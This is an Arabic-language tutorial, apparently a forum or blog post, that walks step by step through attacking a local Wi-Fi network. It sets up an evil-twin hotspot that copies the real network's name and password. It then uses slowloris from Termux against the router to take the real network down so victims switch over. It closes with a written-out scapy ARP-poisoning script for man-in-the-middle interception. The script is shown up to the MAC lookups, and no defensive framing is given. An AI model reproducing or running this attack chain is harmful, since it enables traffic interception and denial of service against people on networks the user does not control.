أداة ARP Spoofing هي تقنية تُستخدم لاعتراض وتغيير حركة البيانات بين الأجهزة في شبكة محلية (LAN). تعتمد هذه الأداة على استغلال بروتوكول ARP (Address Resolution Protocol) الذي يُستخدم لربط عناوين IP بعناوين MAC في الشبكة.ما هي ARP Spoofing؟ARP Spoofing هو هجوم شبكي يتم فيه إرسال رسائل ARP مزيفة إلى شبكة محلية. هذه الرسائل تُخدع الأجهزة في الشبكة لتعتقد أن عنوان MAC الخاص بالمهاجم هو عنوان MAC الخاص بجهاز آخر. من خلال هذا الخداع، يمكن للمهاجم:اعتراض البيانات المرسلة بين الأجهزة.تعديل البيانات المرسلة بين الأجهزة.إعادة توجيه البيانات إلى وجهة أخرى.وظيفة ARP Spoofingوظيفة ARP Spoofing الرئيسية هي تنفيذ هجمات Man-in-the-Middle (MITM) حيث يمكن للمهاجم مراقبة أو تغيير حركة البيانات بين الأجهزة في الشبكة. يمكن استخدامها أيضًا لأغراض أخرى مثل:استهداف أجهزة معينة في الشبكة.تنفيذ هجمات Denial of Service (DoS).جمع معلومات الشبكة والمستخدمين.
يالله نبلش عمل الهجوم
اولا :عمل شبكة مزيفة لخداع الضحايا
_/الطريقة/
في البداية سنحتاج ان نقوم بعمل نقطة وصول من هواتفنا وستكون هي الشبكة المزيفة ويجب أن تكون لدينا بعض البيانات للشبكة الأصلية وهي الأسم و الرمز وهاكذا سنقوم بعمل الشبكة المزيفة بنفس شكل الشبكة الأصلية و سنضع نفس الأسم و الرمز على الشبكة المزيفة.
ثانيا :التجهيز لي اختراق الشبكة واقفالها
_/الطريقة/
سنقوم بنسخ IP البوابة للشبكة الأصلية ونسخ IP الشبكة المزيفة بعد نسخ IP الشبكة المزيفة ندخل إلى termux☠️
ثالثا :TERMUX☠️وإغلاق الشبكة👾
_/الطريقة/
سندخل إلى Termux ونحمل واحدة من اقوة أدوات DDOS لكي نقوم بأغلاق الشبكة
[اوامر تحميل الأداة]
pkg install git
git clone
https://github.com/gkbrk/slowloris.gitcd slowloris
python3
slowloris.py مثال
python3
slowloris.py 192.168.8.1قم بل انتظار لمدة 10 دقائق وبعدها لكي يصبح الأنترنت وكأنه لا يعمل ابدا في الشبكة وبعدها سيقوم المتصلين بل شبكة الأصلية بعد تعطيلها إلى رأية ماذا حصل في الشبكة فسيرون شبكتين من نفس نوع الشبكة الشبكة الأصلية و الشبكة المزيفة وسوف يدخلون إلى الشبكة المزيفة ويروا ان الأنترنت افضل وسيستقرون عليها وهاذا ما نريدوه.
رابعا :تحميل ARP SPOOFING وكيفية استخدامه سنقوم بكتابة هاذه الأوامر
pkg update
pkg upgrade
pkg install python
pkg install git
pip install scapy
الأن ننشئ سكربت nano بل امر
nano arp_spoof.py
ونكتب تعليمات البرمجة هاذه داخل السكربت
from scapy.all import *
import os
import sys
import threading
import signal
interface = "wlan0"
target_ip = "TARGET_IP"
gateway_ip = "GATEWAY_IP"
packet_count = 1000
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
print("[*] Restoring target...")
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
def get_mac(ip_address):
responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address), timeout=2, retry=10)
for s, r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print("[*] Beginning the ARP poison. [CTRL-C to stop]")
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)
print("[*] Setting up %s" % interface)
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print("[!!!] Failed to get gateway MAC. Exiting.")
sys.exit(0)
else:
print("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))
target_mac = get_mac(target_ip)
if target_mac is None:
print("[!!!] Failed to get target MAC. Exiting.")
sys.exit(0)
else:
print("[*] Target %s is at %s" % (target_ip, target_mac))
